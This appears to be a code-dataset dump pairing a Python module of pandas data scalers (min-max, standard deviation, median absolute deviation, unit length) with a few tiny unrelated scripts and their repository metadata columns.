:param max_value: max value after scaling (default: `1.0`)
:param sklearn_output: if True produces outputs compatible with sklearn Pipeline (default: `False`)
:param name: name for this :class:`Transformer`
Examples:
>>> scaler = MinMaxScaler(x_cols=['x_1'], y_cols=['y_1'])
>>> x_new, y_new = scaler.fit_transform(x, y)
"""
def __init__(self, x_cols=[], y_cols=[], min_value=-1.0, max_value=1.0, sklearn_output=False, name=None):
Transformer.__init__(self, sklearn_output=sklearn_output, name=name)
self.x_cols = x_cols
self.y_cols = y_cols
self.min_value = min_value
self.max_value = max_value
self._d = self.max_value - self.min_value
# the inverse mapping is needed to invert the transformation
self._inverse_map = {'x': None, 'y': None}
def fit_x(self, x):
self.x_cols = _check_cols(x, self.x_cols, self.logging)
self.logging('x_cols: {}'.format(self.x_cols), level=logging.DEBUG)
return self
def fit_y(self, y):
self.y_cols = _check_cols(y, self.y_cols, self.logging)
self.logging('y_cols: {}'.format(self.y_cols), level=logging.DEBUG)
return self
def transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
self._inverse_map['x'] = (_x[self.x_cols].min(), _x[self.x_cols].max())
_x[self.x_cols] = (_x[self.x_cols] - _x[self.x_cols].min()) / (
_x[self.x_cols].max() - _x[self.x_cols].min()) * self._d + self.min_value
return _x
def transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
self._inverse_map['y'] = (_y[self.y_cols].min(), _y[self.y_cols].max())
_y[self.y_cols] = (_y[self.y_cols] - _y[self.y_cols].min()) / (
_y[self.y_cols].max() - _y[self.y_cols].min()) * self._d + self.min_value
return _y
def inverse_transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_min, _max = self._inverse_map['x']
_x[self.x_cols] = (_x[self.x_cols] - self.min_value) / self._d * (_max - _min) + _min
return _x
def inverse_transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_min, _max = self._inverse_map['y']
_y[self.y_cols] = (_y[self.y_cols] - self.min_value) / self._d * (_max - _min) + _min
return _y
class StdScaler(Transformer):
"""Standard deviation scaler.
This will scale the data (by columns) following x' = ( x - mean(X) ) / ( k * std(X) ).
Args:
:param x_cols: a list of column names or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param y_cols: a list of column names or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param k: scaling factor for the standard deviation (default: `3.0`)
:param skipna: exclude NA/null values when computing the result (default: `True`)
:param sklearn_output: if True produces outputs compatible with sklearn Pipeline (default: `False`)
:param name: name for this :class:`Transformer`
Examples:
>>> scaler = StdScaler(x_cols=['x_1'], y_cols=['y_1'])
>>> x_new, y_new = scaler.fit_transform(x, y)
"""
def __init__(self, x_cols=[], y_cols=[], k=3.0, skipna=True, sklearn_output=False, name=None):
Transformer.__init__(self, sklearn_output=sklearn_output, name=name)
self.x_cols = x_cols
self.y_cols = y_cols
self.k = k
self.skipna = skipna
# the inverse mapping is needed to invert the transformation
self._inverse_map = {'x': {}, 'y': {}}
def fit_x(self, x):
self.x_cols = _check_cols(x, self.x_cols, self.logging)
self.logging('x_cols: {}'.format(self.x_cols), level=logging.DEBUG)
return self
def fit_y(self, y):
self.y_cols = _check_cols(y, self.y_cols, self.logging)
self.logging('y_cols: {}'.format(self.y_cols), level=logging.DEBUG)
return self
def transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_mean = _x[self.x_cols].mean(skipna=self.skipna)
_std = _x[self.x_cols].std(skipna=self.skipna)
self._inverse_map['x'] = (_mean, _std)
_x[self.x_cols] = (_x[self.x_cols] - _mean) / (self.k * _std)
return _x
def transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_mean = _y[self.y_cols].mean(skipna=self.skipna)
_std = _y[self.y_cols].std(skipna=self.skipna)
self._inverse_map['y'] = (_mean, _std)
_y[self.y_cols] = (_y[self.y_cols] - _mean) / (self.k * _std)
return _y
def inverse_transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_mean, _std = self._inverse_map['x']
_x[self.x_cols] = _x[self.x_cols] * self.k * _std + _mean
return _x
def inverse_transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_mean, _std = self._inverse_map['y']
_y[self.y_cols] = _y[self.y_cols] * self.k * _std + _mean
return _y
class MadScaler(Transformer):
"""Median absolute deviation scaler.
This will scale the data (by columns) following x' = ( x - median(X) ) / ( k * mad(X) ).
Args:
:param x_cols: a list of column names or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param y_cols: a list of column names or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param k: scaling factor for the median absolute deviation (default: `3.0`)
:param skipna: exclude NA/null values when computing the result (default: `True`)
:param sklearn_output: if True produces outputs compatible with sklearn Pipeline (default: `False`)
:param name: name for this :class:`Transformer`
Examples:
>>> scaler = MadScaler(x_cols=['x_1'], y_cols=['y_1'])
>>> x_new, y_new = scaler.fit_transform(x, y)
"""
def __init__(self, x_cols=[], y_cols=[], k=3.0, skipna=True, sklearn_output=False, name=None):
Transformer.__init__(self, sklearn_output=sklearn_output, name=name)
self.x_cols = x_cols
self.y_cols = y_cols
self.k = k
self.skipna = skipna
# the inverse mapping is needed to invert the transformation
self._inverse_map = {'x': {}, 'y': {}}
def fit_x(self, x):
self.x_cols = _check_cols(x, self.x_cols, self.logging)
self.logging('x_cols: {}'.format(self.x_cols), level=logging.DEBUG)
return self
def fit_y(self, y):
self.y_cols = _check_cols(y, self.y_cols, self.logging)
self.logging('y_cols: {}'.format(self.y_cols), level=logging.DEBUG)
return self
def transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_median = _x[self.x_cols].median(skipna=self.skipna)
_mad = _x[self.x_cols].mad(skipna=self.skipna)
self._inverse_map['x'] = (_median, _mad)
_x[self.x_cols] = (_x[self.x_cols] - _median) / (self.k * _mad)
return _x
def transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_median = _y[self.y_cols].median(skipna=self.skipna)
_mad = _y[self.y_cols].mad(skipna=self.skipna)
self._inverse_map['y'] = (_median, _mad)
_y[self.y_cols] = (_y[self.y_cols] - _median) / (self.k * _mad)
return _y
def inverse_transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_median, _mad = self._inverse_map['x']
_x[self.x_cols] = _x[self.x_cols] * self.k * _mad + _median
return _x
def inverse_transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_median, _mad = self._inverse_map['y']
_y[self.y_cols] = _y[self.y_cols] * self.k * _mad + _median
return _y
class UnitLenghtScaler(Transformer):
"""Scale the feature vector to have norm 1.0.
This will scale the data (by row) following X' = X / norm(X).
Args:
:param x_cols: a list of column names or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param y_cols: a list of column names or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param invertible: if True, collect additional data to make the transformer invertible. Note that
this requires storing one value for each row in `x` and `y` (default: `True`)
:param sklearn_output: if True produces outputs compatible with sklearn Pipeline (default: `False`)
:param name: name for this transformer
Examples:
>>> scaler = UnitLenghtScaler()
>>> x_new, y_new = scaler.fit_transform(x, y)
"""
def __init__(self, x_cols='all', y_cols=[], invertible=True, sklearn_output=False, name=None):
Transformer.__init__(self, sklearn_output=sklearn_output, name=name)
self.x_cols = x_cols
self.y_cols = y_cols
self.invertible = invertible
# the inverse mapping is needed to invert the transformation
self._inverse_map = {'x': None, 'y': None}
def fit_x(self, x):
self.x_cols = _check_cols(x, self.x_cols, self.logging)
self.logging('x_cols: {}'.format(self.x_cols), level=logging.DEBUG)
return self
def fit_y(self, y):
self.y_cols = _check_cols(y, self.y_cols, self.logging)
self.logging('y_cols: {}'.format(self.y_cols), level=logging.DEBUG)
return self
def transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
n = numpy.sqrt(numpy.square(_x[self.x_cols]).sum(axis=1))
if self.invertible:
self._inverse_map['x'] = n
_x[self.x_cols] = _x[self.x_cols].div(n, axis=0)
return _x
def transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
n = numpy.sqrt(numpy.square(_y[self.y_cols]).sum(axis=1))
if self.invertible:
self._inverse_map['y'] = n
_y[self.y_cols] = _y[self.y_cols].div(n, axis=0)
return _y
def inverse_transform_x(self, x):
if len(self.x_cols) == 0:
return x
if not self.invertible:
self.logging('the transformer has not been set to be invertible, you should set invertible=True',
level=logging.WARNING)
return x
_x = x.copy()
_x[self.x_cols] = _x[self.x_cols].mul(self._inverse_map['x'], axis=0)
return _x
def inverse_transform_y(self, y):
if len(self.y_cols) == 0:
return y
if not self.invertible:
self.logging('the transformer has not been set to be invertible, you should set invertible=True',
level=logging.WARNING)
return y
_y = y.copy()
_y[self.y_cols] = _y[self.y_cols].mul(self._inverse_map['y'], axis=0)
return _y
| 38.16875
| 143
| 0.599804
| 1,816
| 12,214
| 3.785242
| 0.073789
| 0.050189
| 0.070701
| 0.049462
| 0.889438
| 0.871836
| 0.826157
| 0.817283
| 0.754292
| 0.754292
| 0
| 0.005259
| 0.268299
| 12,214
| 319
| 144
| 38.288401
| 0.763903
| 0.289422
| 0
| 0.694175
| 0
| 0
| 0.037243
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135922
| false
| 0
| 0.019417
| 0
| 0.378641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
22ecdeef7d9419e057fbf8fcce25c512f86fa6f7
| 39
|
py
|
Python
|
getAllPages/app.py
|
alucardlockon/RESTfulTest
|
6e71c2619bfec214baf869322f6cea16b814b4fe
|
[
"MIT"
] | null | null | null |
getAllPages/app.py
|
alucardlockon/RESTfulTest
|
6e71c2619bfec214baf869322f6cea16b814b4fe
|
[
"MIT"
] | null | null | null |
getAllPages/app.py
|
alucardlockon/RESTfulTest
|
6e71c2619bfec214baf869322f6cea16b814b4fe
|
[
"MIT"
] | null | null | null |
import sys
print(sys.version_info)
| 4.875
| 22
| 0.74359
| 6
| 39
| 4.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 39
| 7
| 23
| 5.571429
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
fe1687817672475105aae6254f9baac4e0b8c902
| 114
|
py
|
Python
|
Exe_03.py
|
Oreder/PythonSelfStudy
|
64c774ef469dcede6f653ab8eafd3edc83452876
|
[
"MIT"
] | 1
|
2017-07-28T03:42:29.000Z
|
2017-07-28T03:42:29.000Z
|
Exe_03.py
|
Oreder/PythonSelfStudy
|
64c774ef469dcede6f653ab8eafd3edc83452876
|
[
"MIT"
] | null | null | null |
Exe_03.py
|
Oreder/PythonSelfStudy
|
64c774ef469dcede6f653ab8eafd3edc83452876
|
[
"MIT"
] | null | null | null |
print(3 + 2 > 5 + 7)
print("Is it greater?", 3 > -2)
print("Roosters", 100 - 25 * 3 % 4)
print(7.0/4.0)
print(7/4)
| 22.8
| 35
| 0.552632
| 25
| 114
| 2.52
| 0.52
| 0.063492
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206522
| 0.192982
| 114
| 5
| 36
| 22.8
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0.191304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
a3a7706e82f093c74c5bdd85efff3685bf4925f4
| 43
|
py
|
Python
|
runner.py
|
talajasi7/bookmarking-app
|
f489317751d248b84f728fb331a35a590f0a7669
|
[
"Apache-2.0"
] | null | null | null |
runner.py
|
talajasi7/bookmarking-app
|
f489317751d248b84f728fb331a35a590f0a7669
|
[
"Apache-2.0"
] | null | null | null |
runner.py
|
talajasi7/bookmarking-app
|
f489317751d248b84f728fb331a35a590f0a7669
|
[
"Apache-2.0"
] | null | null | null |
from src.bark import run_bark
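# Launch the Bark bookmarking app (assumption: run_bark starts its interactive menu loop).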
run_bark()
| 8.6
| 29
| 0.767442
| 8
| 43
| 3.875
| 0.625
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 43
| 4
| 30
| 10.75
| 0.861111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
a3fc3215a7189801f0425365c3fc82ad3511e9df
| 115
|
py
|
Python
|
pocketcasts/__init__.py
|
dbeley/python-pocketcasts
|
bf200f94e08a61f7a51c6c05ce9b87ef69d8535e
|
[
"MIT"
] | 2
|
2021-06-25T21:15:52.000Z
|
2021-08-16T16:26:11.000Z
|
pocketcasts/__init__.py
|
dbeley/python-pocketcasts
|
bf200f94e08a61f7a51c6c05ce9b87ef69d8535e
|
[
"MIT"
] | null | null | null |
pocketcasts/__init__.py
|
dbeley/python-pocketcasts
|
bf200f94e08a61f7a51c6c05ce9b87ef69d8535e
|
[
"MIT"
] | 1
|
2020-04-14T17:23:16.000Z
|
2020-04-14T17:23:16.000Z
|
"""TODO"""
from .api import Api # noqa
from .episode import Episode # noqa
from .podcast import Podcast # noqa
| 19.166667
| 36
| 0.695652
| 16
| 115
| 5
| 0.4375
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 115
| 5
| 37
| 23
| 0.869565
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|